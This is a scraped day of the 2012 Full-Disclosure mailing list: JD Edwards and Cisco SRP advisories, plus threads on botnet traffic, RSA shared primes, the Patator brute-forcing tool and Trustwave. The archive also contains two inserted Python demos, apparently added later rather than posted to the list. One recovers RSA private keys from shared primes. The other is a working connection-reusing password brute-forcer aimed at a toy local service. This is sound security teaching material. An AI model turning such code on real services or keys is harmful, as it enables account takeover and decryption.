access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access or modify all the business information processed by the
ERP system.
This would result in the total compromise of the ERP infrastructure.


2. Advisory Information
===

--Release Date: 2012-02-23

--Last Revised: 2012-02-21

--Security Advisory ID: ONAPSIS-2012-04

--Onapsis SVS ID: ONAPSIS-00033

--Researcher: Juan Pablo Perez Etchegoyen

--CVE: CVE-2011-3524

--Initial Base CVSS v2: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


3. Vulnerability Information
===

--Vendor: ORACLE

--Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

--Vulnerability Class: Information Disclosure.

--Remotely Exploitable: Yes

--Locally Exploitable: No

--Authentication Required: No

--Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-04


4. Affected Components Description
==

“The next kernel in the JDE.INI file is the Server Administration Workbench 
(SAW) kernel. This kernel is responsible for collecting and reporting
information about the kernels in EnterpriseOne. The SAW kernel will connect to 
each of the kernels to determine information including:

- Number of users connected to the kernel (if applicable)
- Number of requests processed by the kernel
- Average time to complete the request
- Outstanding requests
- Users connected to the kernel process (if applicable)

This information is displayed in the SAW or Server Manager applications. This 
is critical to monitoring the health of the EnterpriseOne kernels and
providing a view into how the system is executing.” (JD Edwards EnterpriseOne: 
The Complete Reference, copyright 2009 by The McGraw-Hill Companies)

5. Vulnerability Details
===

A specially crafted message sent to the JDENET service (specifically to the 
SAW kernel) lets a remote, unauthenticated user retrieve data from the JDE.INI
configuration file. That data includes the database connection password and 
the node password used for authentication tokens.

Further technical details are withheld for now so that affected customers have 
enough time to patch their systems before the vulnerability is exploited.

6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html

Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis continuously invests resources in research on the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit, the Onapsis Research Labs, has 
been built up since the creation of the company. The experts in this team
lead public research in this area, having discovered and published many of 
the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP s

[Full-disclosure] [Onapsis Security Advisory 2012-03] Oracle JD Edwards SawKernel Arbitrary File Read

2012-02-23 Thread Onapsis Research Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Onapsis Security Advisory: Oracle JD Edwards SawKernel Arbitrary File Read

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs, as well as exclusive 
access to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated attacker might be 
able to access arbitrary files hosted on the ERP system.
This would result in the total compromise of the ERP infrastructure.


2. Advisory Information
===

--Release Date: 2012-02-23

--Last Revised: 2012-02-21

--Security Advisory ID: ONAPSIS-2012-03

--Onapsis SVS ID: ONAPSIS-00030

--Researcher: Juan Pablo Perez Etchegoyen

--CVE: CVE-2011-3509

--Initial Base CVSS v2: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)


3. Vulnerability Information
===

--Vendor: ORACLE

--Affected Components:

JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne Tools 8.98 (older 
versions might also be affected)

--Vulnerability Class: Information Disclosure.

--Remotely Exploitable: Yes

--Locally Exploitable: No

--Authentication Required: No

--Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2012-03


4. Affected Components Description
==

“The next kernel in the JDE.INI file is the Server Administration Workbench 
(SAW) kernel. This kernel is responsible for collecting and reporting
information about the kernels in EnterpriseOne. The SAW kernel will connect to 
each of the kernels to determine information including:

- Number of users connected to the kernel (if applicable)
- Number of requests processed by the kernel
- Average time to complete the request
- Outstanding requests
- Users connected to the kernel process (if applicable)

This information is displayed in the SAW or Server Manager applications. This 
is critical to monitoring the health of the EnterpriseOne kernels and
providing a view into how the system is executing.” (JD Edwards EnterpriseOne: 
The Complete Reference, copyright 2009 by The McGraw-Hill Companies)

5. Vulnerability Details
===

A specially crafted packet sent to the JDENet service (TCP port 6015 by 
default) makes it possible to read any file on the system, provided the JDESAW
kernel is configured (which it is by default). No authentication is required.

Further technical details are withheld for now so that affected customers have 
enough time to patch their systems before the vulnerability is exploited.

6. Solution
===

Apply the Oracle Critical Patch Update of January 2012. More information is 
available at http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html

Onapsis strongly recommends that Oracle customers download the related security 
fixes and apply them to the affected components in order to reduce
business risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2012-01-17: Oracle releases fixes in CPU.
* 2012-02-23: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis continuously invests resources in research on the security of 
ERP systems and business-critical infrastructure.

With that objective in mind, a special unit, the Onapsis Research Labs, has 
been built up since the creation of the company. The experts in this team
lead public research in this area, having discovered and published many of 
the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality
of our solutions and enabling our customers to be protected from the latest 
risks to their critical business information.

Furthermore, the results of these research projects are usually shared with the 
general security and professional community, encouraging the sharing of
information and increasing the common knowledge in this field.


About Onapsis, Inc.
===

Onapsis provides innovative security software solutions to protect ERP systems 
from cyber-attacks. Through unmatched ERP security, compliance and
continuous monitoring products, Onapsis secures the business-critical 
infrastructure of its global custom

Re: [Full-disclosure] Botnet Traffic

2012-02-23 Thread James Smith
Thanks, this is very helpful as well.

-Original Message- 
From: Hurgel Bumpf
Sent: Thursday, February 23, 2012 8:52 PM
To: ja...@smithwaysecurity.com ; full-disclosure@lists.grok.org.uk
Subject: AW: [Full-disclosure] Botnet Traffic




check the arbor atlas for worldwide threats and sources..

http://atlas.arbor.net/

-HB

--
James Smith wrote on Thu, 23 Feb 2012 17:20 EST:

>Hello,
>
>Can anyone on this list provide botnet network traffic for analysis, or Ip’s 
>which have been infected.
>-- 
>Sincerely;
>
>
>James Smith
>CEO, CEH, Security Analyst
>Email: ja...@smithwaysecurity.com
>Phone: 1877-760-1953
>Website: www.SmithwaySecurity.com
>
>
>CONFIDENTIALITY NOTICE: This communication with its contents may contain 
>confidential and/or legally privileged information. It is solely for the 
>use of the intended recipient(s). Unauthorized interception, review, use or 
>disclosure is prohibited and may violate applicable laws including the 
>Electronic Communications Privacy Act. If you are not the intended 
>recipient, please contact the sender and destroy all copies of the 
>communication.
>
>- This communication is confidential to the parties it was intended to 
>serve - 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Botnet Traffic

2012-02-23 Thread Hurgel Bumpf



check the arbor atlas for worldwide threats and sources..

http://atlas.arbor.net/

-HB

--
James Smith wrote on Thu, 23 Feb 2012 17:20 EST:

>Hello,
>
>Can anyone on this list provide botnet network traffic for analysis, or Ip’s 
>which have been infected.
>-- 
>Sincerely;
>
>
>James Smith
>CEO, CEH, Security Analyst
>Email: ja...@smithwaysecurity.com
>Phone: 1877-760-1953
>Website: www.SmithwaySecurity.com
>
>
>CONFIDENTIALITY NOTICE: This communication with its contents may contain 
>confidential and/or legally privileged information. It is solely for the use 
>of the intended recipient(s). Unauthorized interception, review, use or 
>disclosure is prohibited and may violate applicable laws including the 
>Electronic Communications Privacy Act. If you are not the intended recipient, 
>please contact the sender and destroy all copies of the communication.
>
>- This communication is confidential to the parties it was intended to serve -


Re: [Full-disclosure] Botnet Traffic

2012-02-23 Thread Sanguinarious Rose
That is a rather broad request considering how many flavors of
botnets, various software, and purposes of them. I would have to
ask what possible purpose you could want them for considering such
broadness?

However I would watch this
https://twitter.com/#!/pastebin/status/172625863970529280 &
http://pastebin.com/eJqhCjca

On Thu, Feb 23, 2012 at 3:20 PM, James Smith  wrote:
> Hello,
>
> Can anyone on this list provide botnet network traffic for analysis, or Ip’s
> which have been infected.
> --
> Sincerely;
>
>
> James Smith
> CEO, CEH, Security Analyst
> Email: ja...@smithwaysecurity.com
> Phone: 1877-760-1953
> Website: www.SmithwaySecurity.com
>
>
> CONFIDENTIALITY NOTICE: This communication with its contents may contain
> confidential and/or legally privileged information. It is solely for the use
> of the intended recipient(s). Unauthorized interception, review, use or
> disclosure is prohibited and may violate applicable laws including the
> Electronic Communications Privacy Act. If you are not the intended
> recipient, please contact the sender and destroy all copies of the
> communication.
>
> - This communication is confidential to the parties it was intended to serve
> -
>


[Full-disclosure] Botnet Traffic

2012-02-23 Thread James Smith
Hello,

Can anyone on this list provide botnet network traffic for analysis, or Ip’s 
which have been infected.
-- 
Sincerely;


James Smith
CEO, CEH, Security Analyst
Email: ja...@smithwaysecurity.com
Phone: 1877-760-1953
Website: www.SmithwaySecurity.com


CONFIDENTIALITY NOTICE: This communication with its contents may contain 
confidential and/or legally privileged information. It is solely for the use of 
the intended recipient(s). Unauthorized interception, review, use or disclosure 
is prohibited and may violate applicable laws including the Electronic 
Communications Privacy Act. If you are not the intended recipient, please 
contact the sender and destroy all copies of the communication.

- This communication is confidential to the parties it was intended to serve -

Re: [Full-disclosure] RSA and random number generation

2012-02-23 Thread coderman
On Thu, Feb 23, 2012 at 10:50 AM, Georgi Guninski  wrote:
>...
> if i understood the paper correctly they broke some rsa keys because
> they shared a prime $p$ (the rsa keys are different, shared rsa
> keys might be explained by the debian random fiasco or the like bugs).
>
> i would suspect it is quite unlikely entropy/seed to explain the above
> scenario - the odds appear small to me.

see 
https://freedom-to-tinker.com/blog/nadiah/new-research-theres-no-need-panic-over-factorable-keys-just-mind-your-ps-and-qs

"""
How could this happen?

It wasn't obvious at first how these types of entropy problems might
result in keys that could be factored. We'll explain now for the
geekier readers.

Here's one way a programmer might generate an RSA modulus:

prng.seed(seed)
p = prng.generate_random_prime()
q = prng.generate_random_prime()
N = p*q

If the pseudorandom number generator is seeded with a predictable
value, then that would likely result in different devices generating
the same modulus N, but we would not expect a good pseudorandom number
generator to produce different moduli that share a single factor.

However, some implementations add additional randomness between
generating the primes p and q, with the intention of increasing
security:

prng.seed(seed)
p = prng.generate_random_prime()
prng.add_randomness(bits)
q = prng.generate_random_prime()
N = p*q

If the initial seed to the pseudorandom number generator is generated
with low entropy, this could result in multiple devices generating
different moduli which share the prime factor p and have different
second factors q. Then both moduli can be easily factored by computing
their GCD: p = gcd(N1, N2).

OpenSSL's RSA key generation functions this way: each time random bits
are produced from the entropy pool to generate the primes p and q, the
current time in seconds is added to the entropy pool. Many, but not
all, of the vulnerable keys were generated by OpenSSL and OpenSSH,
which calls OpenSSL's RSA key generation code.
"""

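The two seeding patterns quoted above (a predictable seed, then extra material mixed in between p and q) carried through to a working simulation of the shared-prime failure and the GCD recovery. This is an added example, not code from coderman's post or from the blog it quotes. The entropy pool is a toy built on Python's random module, the low-entropy seed and the "boot time" values are constructed, and the primes are shrunk to 128 bits so the script runs in seconds; the RSA arithmetic itself is standard.

```python
"""Shared-prime RSA moduli recovered with a GCD: toy simulation of the
seeding pattern quoted above, NOT a cryptographic key generator."""
import random
from math import gcd

E = 65537  # RSA public exponent


class ToyPool:
    """Stand-in for an entropy pool feeding a PRNG (random.Random, so a run
    with the same seed and the same mixed-in material is reproducible)."""

    def __init__(self, seed: int):
        self._rng = random.Random(seed)

    def add_randomness(self, extra: int) -> None:
        # Mix new material into the pool: reseed from current state plus extra.
        state = self._rng.getrandbits(256)
        self._rng.seed((state << 64) | (extra & ((1 << 64) - 1)))

    def randrange(self, a: int, b: int) -> int:
        return self._rng.randrange(a, b)


def is_probable_prime(n: int, pool: ToyPool, rounds: int = 24) -> bool:
    """Miller-Rabin; bases come from the pool so the run stays deterministic."""
    if n < 2:
        return False
    for s in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % s == 0:
            return n == s
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(pool.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_random_prime(pool: ToyPool, bits: int) -> int:
    while True:
        cand = pool.randrange(1 << (bits - 1), 1 << bits) | 1  # full-size, odd
        if is_probable_prime(cand, pool):
            return cand


def keygen(seed: int, mix_between_primes: int, bits: int = 128):
    """Second pattern from the post: p from the seed alone, then extra material
    (here a 'boot time') mixed in, then q. Returns (p, q, N)."""
    pool = ToyPool(seed)
    p = generate_random_prime(pool, bits)
    pool.add_randomness(mix_between_primes)
    while True:
        q = generate_random_prime(pool, bits)
        if q != p and gcd(E, (p - 1) * (q - 1)) == 1:
            return p, q, p * q


def shared_factors(moduli):
    """Pairwise GCD over public moduli -> {(i, j): common prime}. Fine for a
    handful of keys; Internet-scale scans use a product-tree batch GCD."""
    hits = {}
    for i in range(len(moduli)):
        for j in range(i + 1, len(moduli)):
            g = gcd(moduli[i], moduli[j])
            if 1 < g < moduli[i]:
                hits[(i, j)] = g
    return hits


def private_exponent(n: int, p: int) -> int:
    """With one factor known, d = e^-1 mod (p-1)(q-1) follows immediately."""
    return pow(E, -1, (p - 1) * (n // p - 1))


# Constructed scenario: devices A and B boot from the same low-entropy seed one
# second apart; device C is seeded differently (standing in for a healthy pool).
LOW_ENTROPY_SEED = 0x2012
pA, qA, N1 = keygen(LOW_ENTROPY_SEED, mix_between_primes=1330000000)
pB, qB, N2 = keygen(LOW_ENTROPY_SEED, mix_between_primes=1330000001)
pC, qC, N3 = keygen(0xDEADBEEF, mix_between_primes=1330000002)


def demo():
    """Recover the shared prime from public moduli alone, then decrypt for A."""
    hits = shared_factors([N1, N2, N3])
    d = private_exponent(N1, hits[(0, 1)])
    m = 0xC0FFEE
    return {"distinct_moduli": N1 != N2, "shared_p": hits[(0, 1)],
            "hits": sorted(hits), "decrypted": pow(pow(m, E, N1), d, N1)}


if __name__ == "__main__":
    print(demo())
```

Running it shows N1 and N2 are different keys, yet gcd(N1, N2) hands back the p they share, and from p the private exponent of either key follows; the third modulus, from a differently seeded pool, shares nothing with them. The point of the simulation is that a predictable seed alone would have produced identical keys (easy to spot), while mixing in a little entropy between the primes produces distinct keys that still fall to a GCD, which is the scenario Guninski found unlikely. The pairwise loop suffices for a few keys; the eprint paper linked earlier in the thread used a product-tree batch GCD to do the same over millions.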


Re: [Full-disclosure] RSA and random number generation

2012-02-23 Thread Georgi Guninski
On Wed, Feb 22, 2012 at 09:38:33AM -0800, coderman wrote:
> On Tue, Feb 21, 2012 at 2:09 PM, Ramo  wrote:
> > I'll just leave this here.
> >
> > http://eprint.iacr.org/2012/064.pdf
> 
> anyone who cares about proper key generation uses a hardware entropy
> source. they put them in CPUs, they provide them on motherboards. they
> make them very high throughput so your /dev/urandom will never block
> no matter what the task.
> 
> hwrandom -> egd -> /dev/[u]random always filled at boot and ever
> after... SOLVED.
> 
> anything less is asking for failure.
>

if i understood the paper correctly they broke some rsa keys because
they shared a prime $p$ (the rsa keys are different, shared rsa
keys might be explained by the debian random fiasco or the like bugs).

i would suspect it is quite unlikely entropy/seed to explain the above
scenario - the odds appear small to me.



[Full-disclosure] Cisco Security Advisory: Cisco Small Business SRP 500 Series Multiple Vulnerabilities

2012-02-23 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Small Business SRP 500 Series Multiple Vulnerabilities

Advisory ID: cisco-sa-20120223-srp500

Revision 1.0

For Public Release 2012 February 23 16:00  UTC (GMT)

Summary
===

Cisco Small Business (SRP 500) Series Services Ready Platforms
contain the following three vulnerabilities:

  * Cisco SRP 500 Series Web Interface Command Injection
Vulnerability
  * Cisco SRP 500 Series Unauthenticated Configuration Upload
Vulnerability
  * Cisco SRP 500 Series Directory Traversal Vulnerability

These vulnerabilities are exploited through sessions to the Services
Ready Platform Configuration Utility web interface. In the default
configuration they are reachable from the local LAN side of the SRP
device; they are also reachable from the WAN side if remote management
is enabled. Remote management is disabled by default.

Cisco has released free software updates that address these
vulnerabilities.

Workarounds that mitigate these vulnerabilities are available.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120223-srp500

Affected Products
=

Vulnerable Products
+--

The following Cisco SRP 520 Series models are affected if running
firmware prior to version 1.1.26:

  * Cisco SRP 521W
  * Cisco SRP 526W
  * Cisco SRP 527W

The following Cisco SRP 520W-U Series models are affected if running
firmware prior to version 1.2.4:

  * Cisco SRP 521W-U
  * Cisco SRP 526W-U
  * Cisco SRP 527W-U

The following Cisco SRP 540 Series models are affected if running
firmware prior to version 1.2.4:

  * Cisco SRP 541W
  * Cisco SRP 546W
  * Cisco SRP 547W

To view the firmware version on a device, log in to the Services
Ready Platform Configuration Utility and navigate to the Status >
Router page to view information about the Cisco SRP Series device and
its firmware status.  The Firmware Version field indicates the
current running version of firmware on the Cisco SRP 500 Series
device.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

Cisco SRP 500 Series devices are a flexible, cost-effective,
fixed-configuration customer premises equipment (CPE) with embedded
intelligence to enable service providers to create, provision, and
deploy premium revenue-generating services to small businesses on an
as-needed basis.

Cisco SRP 500 Series devices running affected versions of firmware
contain the following three vulnerabilities.   These vulnerabilities
could be exploited from the local LAN side of the SRP device by
default configuration and the WAN side of the SRP device if remote
management is enabled.  Remote management is disabled by default.

Cisco SRP 500 Series Web Interface Command Injection Vulnerability
+-

Cisco SRP 500 Series devices contain a command injection vulnerability
that could allow an authenticated session to inject commands to be
executed by the operating system.

An attacker could exploit this vulnerability by either enticing an
administrator to access a crafted link or by performing a
man-in-the-middle attack to intercept an authenticated session.  An
exploit could allow the attacker to execute operating system commands
on the device that are run in the context of the root user.

This vulnerability has been documented in Cisco bug ID CSCtt46871 and
has been assigned Common Vulnerabilities and Exposures (CVE) ID
CVE-2012-0363.

Cisco SRP 500 Series Unauthenticated Configuration Upload Vulnerability
+--

Cisco SRP 500 Series devices contain an unauthorized access
vulnerability that could allow an unauthenticated, remote attacker to
upload an unauthorized configuration file.

An attacker could exploit this vulnerability by first creating a
desired configuration file and then uploading it using the
unauthenticated URL. An exploit could allow the attacker to alter the
configuration of the Cisco SRP 500 Series device.

This vulnerability has been documented in Cisco bug ID CSCtw55495 and
has been assigned CVE ID CVE-2012-0364.

Cisco SRP 500 Series Directory Traversal Vulnerability
+-

Cisco SRP 500 Series devices contain a directory traversal
vulnerability in the Local TFTP file upload application that could
allow an authenticated, remote attacker to upload files to directories
in the operating system of the Cisco SRP 500 Series device.  An
attacker could exploit this vulnerability by enticing an authenticated
user to click on a crafted link or by installing malicious files on
the FTP or HTTP server that the administrators of the device may use.
An exploit could allow the attacker to install malicious software on
the Cisco 

Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool

2012-02-23 Thread Grandma Eubanks
That could be. I've done testing with Python with multi-threads and
multi-processing and have gotten a couple hundred more over HTTP than I
have on managing threads (not to mention how much easier it was). However,
this also needed to handle much more data and parse the responses for
validation before continuing, as you said not over network login (I assume
lan here). So perhaps that was my issue with the multi-threaded.

http://code.google.com/p/http-brute

The speed also was an issue. At that speed the threads were not
able to complete at points in time, causing them to be repeated. But when I
spanned cores it no longer became an issue. But as you said, this could've
been just how I was managing the threads.

On Thu, Feb 23, 2012 at 8:18 AM, van Hauser  wrote:

> Hi folks,
>
> as the programmer of hydra, some comments on this ...
>
> On 23.02.2012 06:52, Grandma Eubanks wrote:
> > Multiprocessing is quiet a bit faster than utilizing threads (this
> > should be obvious as threads are GIL locked, while multi-processing can
> > be spread amongst cores with the kernel's scheduler).
>
> yes, multiprocessing is faster than threads, and threads used
> intelligently are faster than forking - but ... for network login
> hacking that is not the bottleneck and its not where optimization helps
> anything.
>
> the secret of being fast is how you balance the connections to the
> network services and skipping parts of the protocols which are not
> essential.
>
> that's why hydra is the fastest one out there (own biased testing ;-)
> http://thc.org/thc-hydra/network_password_cracker_comparison.html )
> although it uses forking. go figure.
> hydra got more stable and faster when I rewrote the balancing engine in
> v7, the v7.2 is now the fastest and is very stable.
>
> (why forking? because when it was written the goal was to be able to run
> on any platform, even on esoteric platforms like ultrix 4, MVS
> openedition etc. - and it did. In today's monocultures that is a less
> useful feature, I agree)
>
> On Feb 22, 2012 6:43 AM, "lanjelot"  wrote:
> > To put it bluntly, I just got tired of using Medusa, Hydra, ncrack,
> > metasploit auxiliary modules, nmap NSE scripts and the like because:
> >  - they either do not work or are not reliable (got me false
> >negatives several times in the past)
> >  - they are slow (not multi-threaded or not testing multiple
> >passwords within the same TCP connection)
>
> have you read the code of the named tools?
> hydra does multiple password attempts in the connection if the protocol
> supports it - the competitors do so too I'd guess, medusa and ncrack use
> threading or parallel socketing - and the false negatives/positives ...
> you will have them too, because its always interpretation of results.
>
> post some speed comparison and show that your tool is ruling :-)
> competition makes the tools better.
>
> Greets,
> van Hauser
>
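Two of the claims traded in this exchange, that a network-bound brute forcer runs fine on Python threads and that pushing many guesses through one TCP connection is where the real speed comes from, shown against a toy loopback login service. This is an added example and not Patator's, Hydra's or any list member's code; the one-line LOGIN protocol, the target credentials and the wordlist are constructed for it, and the server counts the connections it accepts so the two strategies can be compared by what the target actually sees.

```python
"""Connection reuse in a network login brute forcer, run against a toy
loopback service (constructed example; not Patator's or Hydra's code)."""
import socket
import socketserver
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed target: answers "LOGIN <user> <password>\n" with OK/FAIL and,
# like FTP, SMTP or POP3, keeps the connection open for further attempts.
VALID_CREDENTIALS = {"admin": "s3cret", "backup": "backup123"}
WORDLIST = ["123456", "password", "admin", "letmein", "qwerty", "welcome",
            "monkey", "dragon", "football", "s3cret", "iloveyou", "shadow"]


class ToyLoginHandler(socketserver.StreamRequestHandler):
    def handle(self):
        with self.server.lock:
            self.server.connections += 1  # one handle() per TCP connection
        for line in self.rfile:
            parts = line.decode(errors="replace").split()
            if len(parts) != 3 or parts[0] != "LOGIN":
                self.wfile.write(b"ERR\n")
                continue
            ok = VALID_CREDENTIALS.get(parts[1]) == parts[2]
            self.wfile.write(b"OK\n" if ok else b"FAIL\n")


class ToyServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.lock = threading.Lock()
        self.connections = 0


def start_server():
    srv = ToyServer(("127.0.0.1", 0), ToyLoginHandler)  # port 0: pick a free one
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def guess_with_new_connection(port, user, password):
    """Pattern 1: a fresh TCP handshake for every single guess."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(f"LOGIN {user} {password}\n".encode())
        return s.makefile("rb").readline() == b"OK\n"


def brute_reconnect(port, user, wordlist, workers=4):
    """Threads are enough here: the workers block on the network, not the GIL.
    Guesses already queued still run to completion after a hit."""
    with ThreadPoolExecutor(workers) as pool:
        results = pool.map(lambda pw: guess_with_new_connection(port, user, pw), wordlist)
        for pw, ok in zip(wordlist, results):
            if ok:
                return pw
    return None


def brute_reuse(port, user, wordlist, workers=4):
    """Pattern 2: each worker opens one connection and streams its share of the
    wordlist through it; a hit makes the others stop after their current guess."""
    chunks = [wordlist[i::workers] for i in range(workers)]
    found, stop = [], threading.Event()

    def worker(chunk):
        with socket.create_connection(("127.0.0.1", port)) as s:
            reply = s.makefile("rb")
            for pw in chunk:
                s.sendall(f"LOGIN {user} {pw}\n".encode())
                if reply.readline() == b"OK\n":
                    found.append(pw)
                    stop.set()
                    return
                if stop.is_set():
                    return

    threads = [threading.Thread(target=worker, args=(c,)) for c in chunks]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return found[0] if found else None


def run_demo(user="admin", wordlist=WORDLIST, workers=4):
    """Run both strategies against a fresh toy server each and report the hit
    plus the number of TCP connections the target had to accept."""
    report = {}
    for name, strategy in (("reconnect", brute_reconnect), ("reuse", brute_reuse)):
        srv, port = start_server()
        try:
            hit = strategy(port, user, wordlist, workers)
        finally:
            srv.shutdown()
            srv.server_close()
        report[name] = {"password": hit, "connections": srv.connections}
    return report


if __name__ == "__main__":
    print(run_demo())
```

Both strategies find the password; the difference is in what the target sees: one TCP connection per guess against one per worker. That matters for throughput once a real network round trip sits in front of every handshake, for lockout and rate-limit logic keyed on connections, and for the noise left in the target's logs. Two caveats the toy hides: real services often cap failed attempts per connection (OpenSSH's MaxAuthTries, for instance), so a reuse worker has to reconnect when it gets dropped; and with more workers than wordlist entries the chunking leaves idle workers that still open a connection.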

Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool

2012-02-23 Thread Mario Vilas
Indeed. It could also be very fast and not use threads at all. But IMO
it's much harder to write an efficient multithreaded program in python
than in C, at the very least you need a good understanding of the
inner workings of the python interpreter.

I find it a bit suspicious in general that a python program can
outperform a pure C program just like that. It's not impossible, but I
think I'll reserve my judgement on this until some benchmarks are
published.

On Thu, Feb 23, 2012 at 1:36 PM, Andres Riancho
 wrote:
> Grandma,
>
> On Thu, Feb 23, 2012 at 2:52 AM, Grandma Eubanks  wrote:
>> Multiprocessing is quiet a bit faster than utilizing threads (this should be
>> obvious as threads are GIL locked, while multi-processing can be spread
>> amongst cores with the kernel's scheduler).
>
> That's not always true. If the process is network bound (which seems
> to be the case with a bruteforce tool), then having multiprocessing
> will not necessarily increase speed. If the software was well written,
> it can be very fast and use python threads.
>
>> On Wed, Feb 22, 2012 at 6:51 PM, Nate Theis  wrote:
>>>
>>> You might look into PyPy for a speed boost: http://pypy.org
>>>
>>> On Feb 22, 2012 6:43 AM, "lanjelot"  wrote:

 Hello FD,

 Released two months ago, and downloaded a few thousand times since, I
 wanted to share with you a new multi-purpose brute-forcing tool named
 Patator (http://code.google.com/p/patator/).

 I am posting here because I would like to get more feedback from
 people using it, so feel free to fire me an email if you have any
 queries, or rather use the issues tracker on patator project page.

 To put it bluntly, I just got tired of using Medusa, Hydra, ncrack,
 metasploit auxiliary modules, nmap NSE scripts and the like because:
  - they either do not work or are not reliable (got me false
 negatives several times in the past)
  - they are slow (not multi-threaded or not testing multiple
 passwords within the same TCP connection)
  - they lack very useful features that are easy to code in python
 (eg. interactive runtime)

 Basically you should give Patator a try once you get disappointed by
 Medusa, Hydra or other brute-forcing tools and are about to code your
 own small script because Patator will allow you to:
  - Not write the same code over and over, due to its modular design
 and flexible usage
  - Run multi-threaded
  - Benefit from useful features such as the interactive runtime
 commands, automatic response logging, etc.

 Currently Patator supports the following modules :
  - ftp_login     : Brute-force FTP
  - ssh_login     : Brute-force SSH
  - telnet_login  : Brute-force Telnet
  - smtp_login    : Brute-force SMTP
  - smtp_vrfy     : Enumerate valid users using the SMTP 'VRFY' command
  - smtp_rcpt     : Enumerate valid users using the SMTP 'RCPT TO' command
  - http_fuzz     : Brute-force HTTP/HTTPS
  - pop_passd     : Brute-force poppassd (not POP3)
  - ldap_login    : Brute-force LDAP
  - smb_login     : Brute-force SMB
  - mssql_login   : Brute-force MSSQL
  - oracle_login  : Brute-force Oracle
  - mysql_login   : Brute-force MySQL
  - pgsql_login   : Brute-force PostgreSQL
  - vnc_login     : Brute-force VNC

  - dns_forward   : Forward lookup subdomains
  - dns_reverse   : Reverse lookup subnets
  - snmp_login    : Brute-force SNMPv1/2 and SNMPv3

  - unzip_pass    : Brute-force the password of encrypted ZIP files
  - keystore_pass : Brute-force the password of Java keystore files

 The name "Patator" comes from the famous weapon :
 http://www.youtube.com/watch?v=xoBkBvnTTjo

 Cheers!

>
>
>
> --
> Andrés Riancho
> Director of Web Security at Rapid7 LLC
> Founder at Bonsai Information Security
> Project Leader at w3af



-- 
“There's a reason we separate military and the police: one fights the
enemy of the state, the other serves and protects the people. When the
military becomes

Re: [Full-disclosure] Trustwave and Mozilla (Resolved)

2012-02-23 Thread Wesley Kerfoot
http://convergence.io

On 22 February 2012 19:12, Jeffrey Walton  wrote:

> It appears to be official.
>
> Trustwave issued MitM certificates, which is deceptive, unethical, and
> contrary to its agreement for inclusion.
>
> Mozilla just rewarded their violations of trust by continuing their
> inclusion. Apparently, agreements between Mozilla and CAs have no
> veracity as both are more than happy to violate the end user.
>
> Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=724929
> NSS and Firefox Update:
> https://bugzilla.mozilla.org/show_bug.cgi?id=728617
>

Re: [Full-disclosure] Patator - new multi-purpose brute-forcing tool

2012-02-23 Thread Andres Riancho
Grandma,

On Thu, Feb 23, 2012 at 2:52 AM, Grandma Eubanks  wrote:
> Multiprocessing is quiet a bit faster than utilizing threads (this should be
